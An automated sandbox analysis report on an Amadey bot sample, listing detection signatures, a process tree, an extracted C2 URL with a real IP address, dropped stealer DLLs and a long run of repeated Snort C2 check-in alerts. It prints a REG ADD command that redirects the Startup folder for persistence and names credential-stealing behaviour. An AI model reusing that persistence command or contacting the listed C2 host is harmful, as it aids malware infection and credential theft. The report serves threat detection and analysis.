Loading ...

Play interactive tourEdit tour

Analysis Report b5a399c0ea40983abc68b828ccb14efde2db90c047bbf.exe

Overview

General Information

Sample Name:b5a399c0ea40983abc68b828ccb14efde2db90c047bbf.exe
Analysis ID:399599
MD5:31ab82365078548dcea62da7c2380b2e
SHA1:712fbb4df005439b9810090fd3a2962848e252c4
SHA256:b5a399c0ea40983abc68b828ccb14efde2db90c047bbfba9ae418317ce7f036d
Tags:Amadeyexe
Infos:

Most interesting Screenshot:

Detection

Amadey
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected Amadey bot
Yara detected Amadeys stealer DLL
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Creates an undocumented autostart registry key
Machine Learning detection for dropped file
Machine Learning detection for sample
Posts data to a JPG file (protocol mismatch)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file access)
Contains capabilities to detect virtual machines
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry

Classification

Startup

  • System is w10x64
  • b5a399c0ea40983abc68b828ccb14efde2db90c047bbf.exe (PID: 5824 cmdline: 'C:\Users\user\Desktop\b5a399c0ea40983abc68b828ccb14efde2db90c047bbf.exe' MD5: 31AB82365078548DCEA62DA7C2380B2E)
    • blfte.exe (PID: 6156 cmdline: 'C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe' MD5: 31AB82365078548DCEA62DA7C2380B2E)
      • cmd.exe (PID: 6232 cmdline: 'C:\Windows\System32\cmd.exe' /C REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders' /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\e90e419c61\ MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 6240 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • reg.exe (PID: 6288 cmdline: REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders' /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\e90e419c61\ MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • rundll32.exe (PID: 6616 cmdline: 'C:\Windows\System32\rundll32.exe' C:\ProgramData\1a9f26b569d5df\cred.dll, Main MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • rundll32.exe (PID: 7120 cmdline: 'C:\Windows\System32\rundll32.exe' C:\ProgramData\1a9f26b569d5df\scr.dll, Main MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup

Malware Configuration

Threatname: Amadey

{"C2": "http://176.111.174.114/Hnq8vS/index.php"}

Yara Overview

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AmadeyYara detected Amadey botJoe Security
    dump.pcapJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\ProgramData\1a9f26b569d5df\cred.dllJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\cred[1].dllJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security

          Memory Dumps

          SourceRuleDescriptionAuthorStrings
          00000003.00000002.750421474.00000000006C0000.00000004.00000001.sdmpJoeSecurity_AmadeyYara detected Amadey botJoe Security
            00000003.00000002.756024475.0000000002DD0000.00000004.00000001.sdmpJoeSecurity_AmadeyYara detected Amadey botJoe Security
              00000003.00000002.750389865.0000000000694000.00000004.00000001.sdmpJoeSecurity_AmadeyYara detected Amadey botJoe Security
                Process Memory Space: blfte.exe PID: 6156JoeSecurity_AmadeyYara detected Amadey botJoe Security

                  Sigma Overview

                  No Sigma rule has matched

                  Signature Overview

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection:

                  barindex
                  Antivirus detection for dropped fileShow sources
                  Source: C:\ProgramData\1a9f26b569d5df\scr.dllAvira: detection malicious, Label: HEUR/AGEN.1136939
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\cred[1].dllAvira: detection malicious, Label: HEUR/AGEN.1137247
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\scr[1].dllAvira: detection malicious, Label: HEUR/AGEN.1136939
                  Source: C:\ProgramData\1a9f26b569d5df\cred.dllAvira: detection malicious, Label: HEUR/AGEN.1137247
                  Found malware configurationShow sources
                  Source: blfte.exe.6156.3.memstrMalware Configuration Extractor: Amadey {"C2": "http://176.111.174.114/Hnq8vS/index.php"}
                  Multi AV Scanner detection for dropped fileShow sources
                  Source: C:\ProgramData\1a9f26b569d5df\cred.dllReversingLabs: Detection: 82%
                  Source: C:\ProgramData\1a9f26b569d5df\scr.dllReversingLabs: Detection: 82%
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\cred[1].dllReversingLabs: Detection: 82%
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\scr[1].dllReversingLabs: Detection: 82%
                  Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exeReversingLabs: Detection: 34%
                  Multi AV Scanner detection for submitted fileShow sources
                  Source: b5a399c0ea40983abc68b828ccb14efde2db90c047bbf.exeReversingLabs: Detection: 34%
                  Machine Learning detection for dropped fileShow sources
                  Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exeJoe Sandbox ML: detected
                  Machine Learning detection for sampleShow sources
                  Source: b5a399c0ea40983abc68b828ccb14efde2db90c047bbf.exeJoe Sandbox ML: detected

                  Compliance:

                  barindex
                  Detected unpacking (overwrites its own PE header)Show sources
                  Source: C:\Users\user\Desktop\b5a399c0ea40983abc68b828ccb14efde2db90c047bbf.exeUnpacked PE file: 1.2.b5a399c0ea40983abc68b828ccb14efde2db90c047bbf.exe.400000.0.unpack
                  Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exeUnpacked PE file: 3.2.blfte.exe.400000.0.unpack
                  Source: b5a399c0ea40983abc68b828ccb14efde2db90c047bbf.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
                  Source: C:\Users\user\Desktop\b5a399c0ea40983abc68b828ccb14efde2db90c047bbf.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                  Source: Binary string: D:\Mktmp\NL1\Release\NL1.pdb source: b5a399c0ea40983abc68b828ccb14efde2db90c047bbf.exe, blfte.exe
                  Source: Binary string: UC:\kinukuconuwukuwok24_motowubidanagosumozi_dibiciyixaho-pow.pdbpdb source: b5a399c0ea40983abc68b828ccb14efde2db90c047bbf.exe
                  Source: Binary string: C:\kinukuconuwukuwok24_motowubidanagosumozi_dibiciyixaho-pow.pdb source: b5a399c0ea40983abc68b828ccb14efde2db90c047bbf.exe
                  Source: C:\Users\user\Desktop\b5a399c0ea40983abc68b828ccb14efde2db90c047bbf.exeCode function: 1_2_00419F82 FindFirstFileExW,1_2_00419F82
                  Source: C:\Users\user\Desktop\b5a399c0ea40983abc68b828ccb14efde2db90c047bbf.exeCode function: 1_2_0224A1D2 FindFirstFileExW,1_2_0224A1D2
                  Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exeCode function: 3_2_00419F82 FindFirstFileExW,3_2_00419F82
                  Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exeCode function: 3_2_0211A1D2 FindFirstFileExW,3_2_0211A1D2

                  Networking:

                  barindex
                  Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49712 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49713 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49714 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49715 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49716 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49717 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49718 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49719 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49720 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49721 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49722 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49723 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49724 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49725 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49726 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49727 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49728 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49729 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49730 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49731 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49732 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49734 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49735 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49736 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49738 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49739 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49740 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49741 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49742 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49744 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49746 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 100000118 COMMUNITY WEB-CLIENT Internet Explorer URLMON.DLL Content-Type Overflow Attempt 176.111.174.114:80 -> 192.168.2.5:49745
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49747 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49748 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49749 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49751 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49753 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49754 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49755 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49757 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49758 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49759 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49760 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49761 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49762 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49763 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49766 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49767 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49768 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49769 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49770 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49771 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49772 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49773 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49774 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49775 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49776 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49777 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49778 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49779 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49780 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49781 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49782 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49783 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49784 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49785 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49786 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49788 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49789 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49790 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49792 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49793 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49795 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49796 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49797 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49799 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49800 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49802 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49803 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49804 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49805 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49807 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49809 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49810 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49811 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49812 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49814 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49815 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49817 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49818 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49819 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49820 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49822 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49823 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49824 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49825 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49827 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49828 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49830 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49831 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49832 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49833 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49835 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49836 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49837 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49838 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49839 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49841 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49843 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49844 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49845 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49847 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49848 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49849 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49850 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49852 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49853 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49855 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49856 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49857 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49859 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49860 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49861 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49862 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49863 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49865 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49866 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49868 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49869 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49870 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49871 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49873 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49874 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49875 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49876 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49878 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49879 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49881 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49882 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49883 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49885 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49886 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49887 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49888 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49889 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49891 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49893 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49894 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49895 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49896 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49898 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49899 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49900 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49901 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49903 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49904 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49906 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49907 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49908 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49912 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49913 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49914 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49915 -> 176.111.174.114:80
